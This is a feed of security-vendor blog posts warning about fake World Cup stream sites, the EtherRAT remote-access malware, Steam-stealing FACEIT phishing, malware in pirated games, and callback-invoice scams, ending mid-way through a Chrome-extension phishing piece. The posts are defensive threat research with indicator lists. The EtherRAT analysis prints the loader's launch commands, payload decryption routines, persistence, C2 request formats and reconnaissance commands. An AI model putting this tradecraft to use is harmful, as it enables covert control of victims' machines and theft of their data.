Reading view

“Free World Cup stream” sites are serving scams, not football

With the World Cup on, you’ll find no shortage of websites promising every match, live, in HD, for free. They look convincing, usually with a video player, a “Live Stream Available” indicator, a row of server buttons, maybe a match schedule, and a “Watch Live” button. There’s no signup, no paywall, and seemingly, no catch.

But of course there’s a catch. These sites aren’t really in the business of streaming football. What the page is really built to do is fire pop-ups, hidden ads, and redirects through an advertising network we detect as malicious. Instead of watching the match, visitors end up facing scams, malware, and fraudulent downloads.

Here’s how the scam works and how to stay out of it.

.kb-advanced-slider-423028_956a35-72 .kb-slider-pause-button{color:#fff;background-color:rgba(0, 0, 0, 0.8);border:1px solid transparent;}

    If they’re not real streaming sites, what are they?

    We’ve identified more than 40 websites that are effectively identical. They use different World Cup-themed names, but behind the scenes they’re running the same page template, the same code, and the same advertising infrastructure.

    A script generates a separate page for every match, making the operation cheap to run and easy to scale.

    When a stream appears at all, it’s usually embedded from a third-party piracy service. The real business is the advertising surrounding the player.

    A typical page loads eight or more ad and tracking scripts from the same shady network, plus a handful of other ad domains. The hub the whole page is wired to is a domain we detect as malicious. Your data is the product; the “stream” is the bait.

    Why these sites are dangerous, not just annoying

    It’s tempting to shrug this off as the usual price of free streams. But it’s worse than facing a few annoying ads.

    The real threat is the ad network. This isn’t mainstream, vetted advertising. The kind of ad network we flag as malicious is a common delivery route for the stuff that causes harm: fake virus warnings, bogus software update prompts that install malware, fake prize and verification pages, and forced redirects into subscription traps.

    The video window itself is untrusted. The stream is pulled from a third-party piracy service, not anything the site controls or vets. Pirated stream embeds are a well-known source of their own ads, redirects, and hidden clickable overlays, so even the part that looks like a video player can be working against you.

    There’s nobody behind the counter. These are anonymous, disposable sites built around a major sporting event. There’s no real company, no support, no accountability, and no reason for them to care what lands on your screen.

    It’s the oldest play in the scam handbook: take something millions of people want right now, present it nicely, and monetize the rush. Scammers don’t create the demand, they just stand in front of it with a bucket and collect payment.

    How it works (a quick technical version)

    The first tap is hijacked. A script waits for your first click or tap anywhere on the page and uses it to open an ad in a new tab or window, often in the background. Before you’ve watched a second of football, you’ve already triggered an ad.

    The “Play” button is a maze. Clicking Play doesn’t play anything. Instead, you’re sent through prompts like “Click Resume to continue” before you might reach a video. Every extra step is another click, and each click triggers more ads.

    Invisible ads load. The page quietly loads tiny, invisible 1×1-pixel ads and opens more tabs. These exist purely to generate paid ad views. The tactic has many of the hallmarks of ad fraud, and you’re the unwitting traffic. More ads are injected into the player area the moment you try to watch.

    The stream is an afterthought. Often there’s no working stream at all, so the page loops you through “Streams loading… Retry,” which means more clicks and more ads. Whether you ever see the match or not, the ads have already cashed in.

    What the ads are serving up

    The code fires the ads; but here’s what comes out the other end. On these pages, the injected ads tend to fall into two buckets, and neither has anything to do with football.

    The first is fake message notifications: little pop-ups designed to look like real chat alerts, complete with a stranger’s photo and messages such as “Seen my message yet? Let’s talk!” Some include fake voice messages or explicit thumbnails. They’re made to look like notifications you’ve forgotten to check so you’ll click them.

    The second is crypto bait. These ads promote “play-to-earn” games with promises of daily rewards, surprise drops, massive airdrops, and eye-catching claims like a “124% APY yield engine.”

    One warning sign is the promise of guaranteed triple-digit returns and free money for tapping a button. That’s not how legitimate financial products work.

    That’s the whole machine working end to end: football is the doorway, the malicious advertising network is the engine, and the scams are what it’s actually selling.

    How to watch the World Cup safely

    These “Free HD stream, every match, no catch” sites use football as bait to funnel visitors through a malicious advertising network. Here’s how to stay safe:

    • Use official broadcasters and streaming services. That’s where the legal and safe coverage lives.
    • Treat “every match, free, HD, no signup” as a red flag. Broadcast rights are expensive. If a random website is giving everything away for free, it’s making money some other way.
    • Don’t follow a maze of interactions. If a streaming site opens pop-ups, launches extra tabs, or sends you through endless “click to continue” screens, close it.
    • Never trust warnings or download prompts on these sites. Don’t download anything, install anything, or enter any information.
    • Block ads and trackers in the browser. A tool like Malwarebytes Browser Guard can block the advertising and tracking domains these sites rely on, helping stop pop-ups and redirects before they load.
    • Keep your software up to date. Browser and operating system updates often fix security vulnerabilities that attackers try to exploit.
    • Use up-to-date, real-time anti-malware. If you do click something malicious, products like Malwarebytes Premium can block and remove malware before it causes damage.

    Indicators of compromise (IoCs)

    Domains

    arenaworldcupfootball.xyz
    footballworldcup.xyz
    freeworldcup.xyz
    freeworldcupstream.xyz
    freeworldcupstreaming.xyz
    livestreamingworldcup.xyz
    livestreamworldcup.xyz
    liveworldcup.today
    liveworldcup.xyz
    liveworldcup2026.xyz
    liveworldcupmatch.xyz
    matchoraworldcup.world
    matchworldcup.xyz
    sportivaworldcup.xyz
    sportworldcuponline.xyz
    watchworldcup.watch
    watchworldcup.world
    watchworldcup2026.xyz
    watchworldcupfree.live
    watchworldcupfree.online
    watchworldcupfree.xyz
    worldcup2026match.xyz
    worldcuparena.xyz
    worldcupfoootballmatch.xyz
    worldcupfootball.live
    worldcupfootballmat.live
    worldcupfootballmatch.live
    worldcupfootbmatch.xyz
    worldcupfreeonline.xyz
    worldcuplive.world
    worldcuplivestream.online
    worldcupmatch.online
    worldcupmatch.world
    worldcupmatch.xyz
    worldcupmatchlive.live
    worldcupsoccer.live
    worldcupsoccermatch.live
    worldcupstreameast.online
    worldcupstreameast.xyz
    worldcupusa.world
    worldcupusa.xyz


    Stop threats before they can do any harm.

    Malwarebytes Browser Guard blocks phishing pages and malicious sites automatically. Free, one click to install. Add it to your browser →

    •  

    Inside a malicious infrastructure delivering EtherRAT, phishing pages, and malicious software 

    During our recent threat hunting activities, we found EtherRAT malware being distributed by a website with a strange homepage. This homepage allowed us to discover a vast malicious infrastructure distributing malware, malicious documents, remote desktop software, and phishing pages. 

    EtherRAT is a RAT developed in Node.js which allows an attacker to gain complete control over the machine and execute arbitrary code returned by the Command and Control (C2) server. The malware uses the Etherium blockchain to obtain the C2 server, hence the “Ether” part of the name. EtherRAT is typically distributed via MSI, PowerShell, or JavaScript scripts. 

    An open directory that distributes EtherRAT: where it all began 

    While threat hunting, we found an open directory that was distributing MSI installers and PowerShell scripts, which ultimately distributed EtherRAT. In the analyzed cases, the PowerShell scripts and MSI installers were distributed from a “/install” folder.  The versions have a progressive number, ranging from v1 to v10. 

    Figure 1: Open Directory hosting EtherRAT MSI 
    Open Directory hosting EtherRAT MSI 

    The returned home page caught our attention and prompted us to further explore the campaign. 

    The homepage returned by the EtherRAT distribution website 

    Analyzing domains and associated IPs with the EtherRAT distribution, we detected other similar home pages with a hacking-style theme. They appeared to belong to a larger distribution chain, which also distributes phishing, remote control software, and other malware. These websites usually have several folders with malware and phishing related content, and what is displayed depends on the specific infection chain. 

    Different websites that resolve to the same IP addresses have previously returned pages related to fake companies or default templates. The use of these new pages could therefore be a method to make detection more difficult for automated scanners or researchers.  Here are some of the home pages we found:

    Some of the malicious websites indexed on Google 

    EtherRAT is an interesting RAT, as it has few lines of code and allows the execution of arbitrary code returned by the C2 server. Furthermore, using the Ethereum blockchain to obtain the C2 server makes it more resilient to infrastructure takedowns. 

    Technical analysis of EtherRAT 

    The detected websites usually distribute an MSI or PowerShell script with the version name, such as v1.msi, v2.ps1, and so on. 

    MSI Loader 

    The MSI file “v9.msi” contains three components: 

    MSI Filename Description 
    KmPuGimn.cmd BAT launcher 
    cDQMlQAru0.xml First Jscript loader 
    MRaQCipBIZeiZNx.log Encrypted EtherRAT 

    When the MSI is executed, the “KmPuGimn.cmd” file is started: 

    conhost --headless cmd /c "KmPuGimn.cmd" 

    This obfuscated BAT file performs different operations: 

    • Extracts the other files in a random folder in %LOCALAPPDATA%. 
    • Re-executes itself via: 
      • %SystemRoot%\System32\conhost.exe –headless %SystemRoot%\System32\cmd.exe /c call “C:\Users\{user}\AppData\Local\{random_path}\KmPuGimn.cmd” nKWa 
    • Runs the command “where node” to find an existing installation. 
    • Downloads Node.js if it’s not found 
      • Uses “curl -sLo” to download Node.js from the official website. 
      • Extracts to installation directory via “tar -xf”. 
      • Renames extracted directory to “28Q75h”.
    • Loops until both “MRaQCipBIZeiZNx.log” and “cDQMlQAru0.xml” exist, then executes: 
      • conhost.exe –headless C:\Users\{user}\AppData\Local\{random_path}\{random_path}\node.exe cDQMlQAru0.xml 

    The executed “cDQMlQAru0.xml” is a loader that decrypts the embedded code with a XOR function and then executes it with “vm.compileFunction”. 

    decrypted[i] = (encrypted[i] - key[i % key.length] - i) & 0xFF 
    The embedded decrypted code 

    The decrypted code: 

    • Copies node.exe in “C:\Users\{user}\AppData\Local\{random_path}\{random_path}\_MJlLlt5.exe”. 
    • Adds a registry key for persistence with “conhost.exe –headless”. 
    • Decrypts “MRaQCipBIZeiZNx.log” and executes it with “_MJlLlt5.exe” stdin. 

    The decryption algorithm is a custom stream-like decoding routing based on XOR, byte rotations and an accumulator: 

    for e in range(len(data)): 
        byte = data[e] 
        g = prev 
        prev = byte 
        byte = (byte - g) & 0xff 
        byte = byte ^ n[e % len(n)] ^ ((e >> 8) & 0xff) 
        byte = si[byte] 
        byte = (byte - k[e % len(k)]) & 0xff
        result[e] = byte 

    The final stage is to deploy EtherRAT. EtherRAT allows the attacker to: 

    • Execute arbitrary JavaScript code received by the C2 server. This allows the attacker to execute new commands, perform operations on files and folders, modify the registry, and exfiltrate data. 
    • Get a new C2 server using the Ethereum blockchain. 
    • Reobfuscate itself. 
    • Save the logs to “svchost.log”. 
    Part of decrypted EtherRAT code 

    The EtherRAT uses Ethereum’s “eth_call” JSON-RPC method to retrieve the active C2 URL from a smart contract on the Ethereum mainnet.  

    The blockchain parameters in this case are: 

    • Contract: 0x88ea8d0bc4146f0a018e989df3fd089ac48f9a58 
    • Function selector: 0x7d434425 
    • Argument: 0xf6a772e163e64b07f658946f863b5d457d88f9f0 
    The decoded C2 from Ethereum blockchain 

    The contacted URLs to obtain the C2 server endpoint are: 

    • mainnet[.]gateway[.]tenderly[.]co 
    • rpc[.]flashbots[.]net/fast 
    • rpc[.]mevblocker[.]io 
    • eth-mainnet[.]public[.]blastapi[.]io 
    • ethereum-rpc[.]publicnode[.]com 
    • eth[.]drpc[.]org 
    • eth[.]merkle[.]io 

    Polling requests use randomized URL patterns based on some parameters defined in the code: 

    GET /api/<4-byte-hex>/<victim-uuid>/<4-byte-hex>.<ext>?<param>=<build-id> 
    X-Bot-Server: <c2_url> 

    In the analyzed sample, the parameters are: 

    • Build ID: “6f816d80-0d6c-4384-9cd6-6b79965fc08f” 
    • ext: randomly selected from “png”, “jpg”, “gif”, “css”, “ico”, “webp”. 
    • param: randomly selected from “id”, “token”, “key”, “b”, “q”, “s”, “v”. 

    After startup, the RAT sends its own source code to the C2 server. The C2 responds with a newly obfuscated version of the script, which is written back to disk, making each execution generate a new file hash. 

    POST /api/[REOBF_PATH]/<victim-uuid> 
    Body: { "code": "<current_script_contents>", "build": "<build_id>" } 

    After the EtherRAT execution, we observed different post-compromised cmd.exe activities to check the environment. For example: 

    • powershell -NoProfile -NonInteractive -WindowStyle Hidden -Command “(Get-WmiObject Win32_VideoController).Name”
    • reg query “HKLM\SOFTWARE\Microsoft\Cryptography” /v MachineGuid 
    • powershell -NoProfile -NonInteractive -WindowStyle Hidden -Command “(Get-WmiObject Win32_ComputerSystem).Domain” 
    • powershell -NoProfile -NonInteractive -WindowStyle Hidden -Command “(Get-WmiObject Win32_ComputerSystem).PartOfDomain” 
    • cmd.exe /d /s /c “net session” 
    EtherRAT logs 

    PowerShell Loader 

    The activities performed by the PowerShell loaders are very similar to the last stage of the JS script of the MSI installer: 

    • Downloads Node.js if it’s not present. 
    • Create the necessary directories. 
    • Decode the EtherRAT with a custom decryption algorithm. 
    • Execute Node.js with conhost.exe and the decrypted EtherRAT payload. 

    We detected some variants of the PowerShell loader hosted on these websites; namely that the functions’ names and the decryption functions change in the analyzed PowerShell scripts. 

    The decryption of EtherRAT payload with the custom decryption algorithm 

    Tracking the malicious infrastructure 

    When we analyzed the different websites with the “hacking-theme” pages, we found that in the past many had hosted multiple phishing pages in some specific paths. For example: 

    • /zht/sharep-redirect.html 
    • /bl/me.php 
    • /t/teams 
    • /teams/Windows/invite.php 

    It seems that these domains and IPs are actually part of a much larger infrastructure that distributes malware, phishing, malicious documents, and remote software. It is possible that these infrastructures are shared by multiple threat actors who activate different URL endpoints based on the specific campaign. 

    Interestingly, the majority of the domains related to this malicious infrastructure in the past also returned an HTML page related to a “Bulletproof Infrastructure” service.  

    We found that these phishing campaigns typically start via emails with documents attached, such as PDF or Excel files. These documents ask the user to click a link to view another document. Below are two examples of the phishing documents attached to the emails:

    These phishing pages typically ask the user to enter their email address, then continue the infection chain and distribute phishing or malware pages.  Below are some of the phishing pages detected within the malicious infrastructure:

    Misconfigurations exposed the phishing kits 

    While tracking malicious websites, we found one with an open directory containing part of the phishing kit used in the campaigns. 

    Open directory hosting part of phishing kits

     

    The open directory contained several folders with code and pages related to the phishing campaigns. 

    Phishing kit code 

    Additionally, some domains were misconfigured and allowed the download of “cl.zip”, which contained the source code for the “URL Cloaker” pages. 

    Part of “URL Cloaker” code 

    Indicators of Compromise (IOCs)  

    IPs 

    82[.]165[.]65[.]244: malicious infrastructure  

    185[.]221[.]216[.]121: malicious infrastructure  

    43[.]163[.]233[.]166: malicious infrastructure  

    40[.]160[.]238[.]30: malicious infrastructure  

    159[.]89[.]227[.]204: malicious infrastructure  

    57[.]128[.]31[.]168: malicious infrastructure  

    Domains 

    ivorilla[.]cloud: EtherRAT distribution  

    mx[.]nrlwz[.]com: EtherRAT distribution  

    dn[.]eyqwj[.]com: EtherRAT distribution  

    bi[.]mkrjcsw[.]com: EtherRAT distribution  

    dorqen[.]casa: EtherRAT distribution  

    kelvra[.]club: EtherRAT distribution  

    cambioefectivo[.]com: EtherRAT C2  

    vabelles[.]com: EtherRAT C2  

    tranzed[.]org: EtherRAT C2  

    kibrisarazi[.]com: EtherRAT C2  

    aravisblog[.]com: EtherRAT C2  

    publicspeakingtip[.]org: EtherRAT C2  

    Acknowledgements 


    Stop threats before they can do any harm.

    Malwarebytes Browser Guard blocks phishing pages and malicious sites automatically. Free, one click to install. Add it to your browser →

    •  

    Fake verification pages are stealing Steam accounts from players

    Online gamers should watch out for a convincing scam that aims to steal your Steam account.

    The scam uses fake FACEIT verification pages that look legitimate, complete with official branding, working links, and what appears to be a real Steam login window. By the time it asks for your password, many victims are convinced they’re interacting with a genuine service.

    The goal is to steal your Steam account.

    Why this scam targets FACEIT players

    If you’re not a competitive gamer, FACEIT might not mean anything to you. But to millions of people, it’s a big deal, and that makes it a target for impersonation by cybercriminals.

    FACEIT is one of the largest competitive gaming platforms for Counter-Strike 2 (CS2). Millions of players use it for ranked matches, tournaments, leagues, and advanced anti-cheat protections.

    To use FACEIT, players typically connect their Steam platform accounts, which are valuable for scammers.

    A stolen Steam account can contain:

    • Hundreds or thousands of dollars’ worth of purchased games
    • Valuable CS2 skins and items, some worth significant amounts of real money
    • Wallet funds and saved payment methods
    • Years of friends, messages, and community reputation

    Once criminals gain access, they can steal items, scam friends, or sell the account on criminal marketplaces.

    Because FACEIT connects to Steam, a fake “FACEIT verification” page is an easy way to trick people. Victims think they’re updating their account, but attackers are really trying to steal Steam accounts that may contain valuable games, skins, and wallet funds. Gamers are especially vulnerable because they’re used to linking accounts and following verification steps, and may act quickly if they think their access to a game is at risk.

    How the scam works

    The attack starts with a website that looks like an official FACEIT page. The scam pages are likely distributed through the same channels gamers use every day: community forums, chat servers, social media posts, and direct messages.

    The page claims FACEIT is offering free, optional identity verification to help build a more trusted community. It’s polished, uses the correct branding, and even includes working links to FACEIT’s real blog and support pages. Everything about it is designed to make you think you’re on a genuine FACEIT website, but you’re not.

    Fake FACEIT verification page
    Fake FACEIT verification page

    Instead of using the official faceit.com domain, the scammers use lookalike addresses such as:

    • faceit-discord.com
    • faceit-clubs-verify.com
    • faceit-verification-clubs.com

    The extra words like “verification” or “discord,” are designed to make these addresses look legitimate at a glance, but they’re sites that are controlled by cybercriminals.

    Many of these domains are only days or even hours old. Scammers constantly register new ones, knowing they’ll likely be blocked eventually. That’s why a site not being flagged as dangerous doesn’t mean it’s safe.

    There are small clues, though. In one example, the page listed both “Copyright 2024” and “Copyright 2025.” Legitimate companies rarely make mistakes like that, but scam sites often do.

    After the verification pitch, the page claims there’s a problem with your CS2 account and asks you to update your information to prove you’re not a cheater or using a smurf account.

    Here’s the clever part. The QR code appears blurry and difficult to scan. Researchers believe that’s intentional. After a few failed attempts, many users are likely to give up and click the easier-looking “Sign in through Steam” button instead.

    The broken QR code is the nudge that guides victims toward the part of the page where the real theft happens.

    Fake FACEIT page with a blurry QR code and "Sign in with Steam" button
    Fake FACEIT page with a blurry QR code and “Sign in with Steam” button

    When users eventually give up on the QR code and click the button, a Steam login window appears. It looks convincing, complete with the Steam logo, login fields, and what appears to be a steamcommunity.com address bar.

    But the window is fake.

    Fake Steam sign-in window steals your account details
    Fake Steam sign-in window steals your account details

    Instead of opening a real Steam login page, the scammers display a convincing copy inside the website itself. Security researchers call this a Browser-in-the-Browser attack. The fake window looks and behaves like a genuine browser pop-up, but the address bar is just part of the image.

    Anything entered into the form goes straight to the criminals. If the page also asks for a Steam Guard code, that gets stolen too, allowing attackers to access the account. Some victims are then tricked into “protecting” their items by transferring them to a friend or backup account, when they’re actually sending them directly to the scammers.

    How to protect yourself against this scam

    A few simple habits can stop this scam:

    • Check the real address bar. FACEIT’s official website is faceit.com. Be wary of lookalike domains such as faceit-discord.com or faceit-clubs-verify.com. Remember: a login window inside a webpage can fake its own address bar. Trust the one at the top of your browser, not the one inside the page.
    • Be suspicious of blurry QR codes. Researchers believe the QR code in this scam is deliberately blurred to push users toward the “Sign in through Steam” button instead.
    • Treat urgency as a warning sign. Messages about account problems, verification, or losing access are designed to make you act quickly. Slow down and verify first.
    • Go to the source. If you’re unsure whether FACEIT or Steam needs something from you, open the official website or app yourself rather than following links from Discord, messages, or ads.
    • Add another layer of protection. Scam sites often look legitimate. Malwarebytes Browser Guard can help block known phishing pages and other online scams before you enter your username and password.

    If you already entered your details

    Change your Steam password immediately, make sure Steam Guard is enabled, and sign out of all other devices. Check your Steam API key settings and remove any key you don’t recognize. Change the password anywhere else you reused it and review your account for unauthorized trades or purchases.

    Why this scam works

    This scam works because it doesn’t look like a scam. The branding is convincing, the story makes sense, and even the Steam login window appears legitimate.

    Most people know to check the address bar before entering a password. Browser-in-the-Browser attacks are designed to defeat that habit. Because the fake Steam window is built into the page itself, the criminals can make its address bar say whatever they want, including steamcommunity.com.

    The safest approach is to be suspicious of any login window that appears inside another website. If you’re unsure, close the page and sign in to Steam the way you normally would, through the official app or by typing the address yourself.

    That small pause, that refusal to take the convenient shortcut a page is pushing you toward, is all it takes to keep your account yours.


    Stop threats before they can do any harm.

    Malwarebytes Browser Guard blocks phishing pages and malicious sites automatically. Free, one click to install. Add it to your browser →

    •  

    Pirated PC games are delivering password-stealing malware

    A new Windows malware campaign hides inside pirated PC games and modified installers for franchises like Far Cry, Need for Speed, FIFA, and Assassin’s Creed.

    Researchers estimate that more than 400,000 devices worldwide have been infected, with around 30,000 users in the US.

    The infection method is simple and effective. Users are lured into installing a fully functional free game. While the cracked and repacked game appears to work, the malware installs silently in the background.

    The strain is being called “RenEngine loader” and sometimes referred to as Ren’Py because parts of the malicious code are embedded in a legitimate Ren’Py launcher used to run some visual novel games. When the launcher runs, it decompresses the game files and secretly starts the infection chain.

    Ren’Py is a legitimate, open-source visual novel engine used by developers to make story-driven games with text, images, sound, and interactive choices. The malware in this case is not Ren’Py itself. Attackers are abusing the engine or its launcher as a delivery method to hide malicious code inside pirated game installs.

    In practice, the primary infection vector is software piracy. Victims download cracked games or repacked installers from unofficial sites, then run what looks like a normal game launcher or setup file. In reality, they’re infecting their computer with a malware loader.

    At the time of writing, this loader is trying to deliver an infostealer called ARC, which can grab saved browser passwords, cookies, cryptocurrency wallets, autofill data, system details, and clipboard contents.

    But we’ve also seen other payloads being dropped, including Rhadamanthys stealer, Async Remote Access Trojan (RAT), and Backdoor.XWorm, which can expand the damage from credential theft to full remote control of the machine. That can mean account takeovers, financial fraud, crypto theft, and deeper compromise of personal or work data.

    Worst of all, a user may not realize they are infected until usernames and passwords have been stolen or the machine starts behaving strangely. 

    How to stay safe

    The most important lesson here is that “free” cracked software is often a delivery mechanism for malware, not a bargain. Once a loader like this is on the machine, the real goal is usually to steal credentials or install a secondary payload that is more persistent and more damaging.

    Some other general advice to stay safe:

    • Don’t download installers from unofficial sources.
    • Use real-time, up-to-date anti-malware protection to block loaders.
    • Keep your software up to date, especially Microsoft patches and other security-related programs.

    If you think your computer is infected and want to make sure, follow the instructions posted here. The amazing volunteers on our forums will help you through the process of cleaning your machine.


    We don’t just report on threats—we remove them

    Cybersecurity risks should never spread beyond a headline. Keep threats off your devices by downloading Malwarebytes today.

    •  

    We found this fake-invoice campaign while scammers were still building it

    A new batch of fake payment invoices is being staged right now, and we caught the campaign while it was still being put together. The emails impersonate PayPal, Amazon, and Geek Squad, and others, and they all share one goal: to scare you into calling a phone number where a fake “support agent” is waiting.

    What makes this wave unusual is that some of the templates we recovered still contained blank fields where the phone number and price should have been, while others were already complete and in circulation. We caught the campaign mid-rollout.

    What’s the scam?

    If you receive an email that looks like a receipt—“Your subscription renewed for $349,” “You sent a payment of $598.96”—and it tells you to call a number to cancel or dispute the charge, stop.

    There is no charge. The email exists to get you on the phone with a scammer who will then try to talk you into handing over remote access to your computer, your card details, or a “refund” that somehow requires you to send them money.

    This particular flavor is called a “phantom invoice” or “refund” scam, and the trick is psychological, not technical. That’s why these emails can often slip past spam filters: there’s often no malicious attachment or link for security systems to analyze. The scam is in the phone number you’re urged to call.

    If you didn’t make the purchase, there’s no need to call the number in the email to cancel it. Real companies don’t pressure customers into resolving unexpected charges through unsolicited phone numbers.

    The goal is simple: create enough concern to get you to call. You see a significant charge you don’t recognize, say $499, and your first instinct is to stop it. The invoice helpfully provides a number to call “if this wasn’t you.” So you call, and now you’re talking to the scammer.

    From there, the conversation usually leads to one of a few outcomes. They may ask you to install software so they can “fix” the charge, giving them access to your computer. They may ask for your card or bank details to “process the refund.” Or they may “accidentally” refund too much and ask you to send the difference back, usually by gift card or bank transfer.

    The invoice is just the bait, while the phone call is the trap.

    These emails are convincing, and some are already reaching inboxes. The good news is that simply receiving one doesn’t put you at risk. The scam only works if it succeeds in getting you to call the number provided. If you recognize the message as fraudulent and delete it, the attack stops there.

    If you did call the number and followed instructions from a scammer, run a virus scan and check your bank accounts. Change your critical passwords, enable multi-factor authentication (MFA), and make sure your security software is up to date.

    How we caught it half-built

    Most scam investigations start after the damage is done. This one was different. We came across a cluster of nearly identical invoice templates that were clearly part of the same kit, and several of them were incomplete.

    Where a finished scam email would show a phone number, some of these showed the literal text #TFN# instead, which is just a placeholder. (“TFN” is the scammers’ shorthand for toll-free number, the callback line they route victims to.) Others left the price as #PRICE#, the date as #DATE#, and the recipient as #EMAIL#. These are merge fields—the blanks a bulk-sending tool fills in automatically before a campaign goes out.

    Finding those placeholders still in place told us that the operation was still being assembled. Some templates were still half-finished, while others were already complete and carrying live callback numbers. We’d caught the campaign mid-rollout, between being built and fully launched.

    Why these invoices look believable

    The scammers use familiar brands such as PayPal, Amazon, and Geek Squad. They’re companies people expect to receive receipts and renewal notices from, which lowers suspicion.

    The charges are also carefully chosen. Amounts in the few-hundred-dollar range are large enough to cause concern but still seem plausible as a subscription renewal or online purchase.

    Many messages add urgency, telling recipients to call quickly to dispute or cancel the charge. This pressure is designed to stop people from verifying the transaction independently.

    Some invoices even combine trusted brands, such as claiming a payment was sent through PayPal to Amazon. Referencing multiple well-known companies makes the message appear more credible.

    How to spot a fake invoice

    The good news is that these scams share warning signs. Once you know what to look for, they get a lot easier to catch. Watch for any of these:

    • A charge you don’t remember making. If you don’t recognize the charge, verify it independently through your account or bank. If there’s no record of it, the invoice is likely a lure designed to get you to call.
    • A ticking clock. “Call within 12 hours,” “cancel before it renews,” or “act immediately” provide fake urgency designed to stop you thinking. Real billing problems can wait while you check.
    • Brands you trust, used as cover. The more familiar the logo, the less carefully people read. Scammers borrow trust they didn’t earn.
    • Odd details that don’t quite fit. A PayPal email “from” Amazon, a stray address that belongs to no one, or slightly off wording. Trust the small things that feel wrong.
    • Pressure to keep you on the phone. Once you call, a real company would never stop you from hanging up to verify, but a scammer will.

    If even one of these is present, treat the whole message as suspicious.

    Remember the single rule that defeats this entire scam: A genuine company will never rush you onto a call to undo a payment you never made. If you’re not sure whether a charge is real, close the email and check your account the normal way: by typing the company’s website into your browser yourself, or calling the number on the back of your bank card.

    Pro tip: Malwarebytes Scam Guard can help spot scams like these and guide you in what to do next, while Browser Guard will block you from accessing scam websites.

    What to do if one of these lands in your inbox

    If you receive a suspicious invoice like the ones described here, take a few simple precautions:

    • Don’t call the number. That’s the core of the scam. Legitimate refunds or cancellations don’t require you to call a number from an unsolicited receipt.
    • Don’t reply or click anything. Treat the message as suspicious, even if it looks legitimate.
    • Verify charges independently. If you’re concerned a charge might be real, log in directly to PayPal, your bank, or the retailer by typing the address yourself and reviewing your transaction history.
    • Report it. Forward suspected phishing emails to the impersonated company’s abuse address and, in the US, report them to the FTC at reportfraud.ftc.gov. Reporting helps disrupt scam operations.
    • If you already called, end the conversation. Don’t install any software they recommend. If you granted remote access or shared payment information, contact your bank immediately and run a trusted security scan on your device.
    • Be wary of urgency. Phrases like “within 12 hours” or “cancel now” are designed to pressure you into acting before you think. Take the time to verify the claim independently.

    Scammers are increasingly shifting to tactics that software can’t easily inspect. A phone number in an email is difficult for security tools to evaluate, and the actual scam happens over a phone call instead of through a malicious link or attachment.

    That’s why finding this campaign during rollout matters. Instead of seeing the damage afterward, we got a look at the preparation: unfinished templates, incomplete details, and the scam kit before it was fully deployed.

    The best defense is simple: if an unexpected invoice tells you to call a number immediately, stop and verify the charge independently first.

    Indicators of compromise

    Domains

    invoicepdfin[.]xyz

    invoicepdfus[.]xyz

    invoicepdfusa[.]xyz

    invoicerep[.]xyz

    invoicestatement[.]xyz

    invoicestm[.]xyz

    Callback numbers

    804-392-2793

    801-640-8589


    Something feel off? Check it before you click.  

    Malwarebytes Scam Guard helps you analyze suspicious links, texts, and screenshots instantly.  

    Available with Malwarebytes Premium Security for all your devices, and in the Malwarebytes app for iOS and Android.  

    Try it free → 

    •  

    Infostealers are becoming the go-to phishing payload

    Phishing has changed. Slowly but surely, cybercriminals are turning to infostealers instead.

    Traditional phishing hasn’t gone away. Far from it. But many attackers are no longer focused solely on tricking victims into entering usernames and passwords on fake login pages. Instead, they are using infostealers to quietly collect passwords, cookies, browser data, and other sensitive information from infected devices.

    This approach is attractive because it scales well and reduces friction. Instead of relying on a victim to type credentials into a fake site, the malware can harvest logins already saved in browsers, session tokens, autofill data, cryptocurrency wallet details, and even files that contain useful information.

    This makes the attack chain less visible. A traditional phishing email often leaves obvious clues: a suspicious link, a fake login page, or a strange attachment. Infostealers are different. They can arrive through malicious online ads (malvertising), cracked software, fake browser updates, game cheats, or dubious download sites, and once installed, they work in the background, stealing whatever the victim’s device has in store.

    Part of this shift could be due to the widespread adoption of multi-factor authentication (MFA). By stealing session cookies, cybercriminals can bypass MFA, so they can access accounts without needing a password or authentication code.

    Another factor is the rise of the malware-as-a-service (MaaS) ecosystem. Infostealers are cheap to deploy, easy to scale, and highly profitable. Rather than building a full attack chain themselves, many criminals buy access to ready-made stealer kits, loaders, or initial access services from underground vendors. This lowers the barrier to entry and allows less-skilled attackers to run credential theft operations.

    In many cases, infostealers are just the first stage of a larger criminal operation. The stolen data is collected, packaged, and sold to other criminals interested in the harvested information. These buyers may specialize in fraud, account takeover, business email compromise, or ransomware. A single infected machine can generate multiple revenue streams: credentials for one buyer, session cookies for another, and corporate access or wallet data for a third.

    That division of labor is one reason infostealers have become so persistent. Operators can update their code, rotate infrastructure, and launch new campaigns with minimal effort, while affiliates handle distribution through phishing, malvertising, fake downloads, or social media lures.

    How to stay safe

    Because infostealers commonly arrive through malvertising, fake browser updates, and one-click downloads, it’s worth treating ads and pop-ups with healthy skepticism. My personal tip: Never click on sponsored ads. Instead, visit official websites directly and download software only from trusted sources such as official vendor sites or app stores.

    Another increasingly popular technique is ClickFix, a social engineering attack that tricks users into infecting their own devices. Never run commands or scripts copied from websites, emails, or messages unless you trust the source and understand the action’s purpose. If a website tells you to execute a command or perform a technical action, check official documentation or contact support before proceeding.


    Picked up something you shouldn’t have?


    Pirated software, game cheats, and cracked tools remain some of the most common delivery methods for infostealers. These downloads often come bundled with malware that installs alongside the software you intended to get. The same caution applies to many browser extensions and add-ons that promise extra features or convenience. Stick to extensions from reputable developers, check reviews and permissions carefully, and avoid installing any add-on that asks for more access than it plausibly needs.

    Phishing emails are still a major threat, but many can be spotted if you slow down and verify before clicking. Even if an email looks like it comes from a trusted brand, treat unsolicited attachments and links with caution, especially when they urge you to open a file, install something urgently, or fix a billing issue. If you’re unsure, check the sender address, look for typos or odd phrasing, and confirm the request through a separate channel such as the company’s official website rather than the link in the email.


    We don’t just report on threats—we remove them

    Cybersecurity risks should never spread beyond a headline. Keep threats off your devices by downloading Malwarebytes today.

    •  

    These convincing copyright notices are designed to steal Google logins

    A new scam is targeting people who publish Chrome extensions.

    The scam arrives as an official-looking “copyright removal request” claiming your extension is about to be removed from the Chrome Web Store and that you have 48 hours to appeal.

    It even looks personalized. After you enter your extension’s ID to “verify” it, the page pulls in your extension’s real name and icon. But it’s all part of a phishing attack designed to steal your Google username and password.

    If attackers gain access to a developer account, they may be able to take over the extension, access developer resources, or potentially push malicious updates to users.

    What’s actually going on

    If you’ve published a Chrome extension, you might encounter a page that looks like an official Google notice warning that your extension is being removed for copyright infringement.

    The page asks you to enter your extension ID, then displays your real extension details alongside a complaint number and countdown clock. It pressures you to sign in with Google to file an appeal before time runs out.

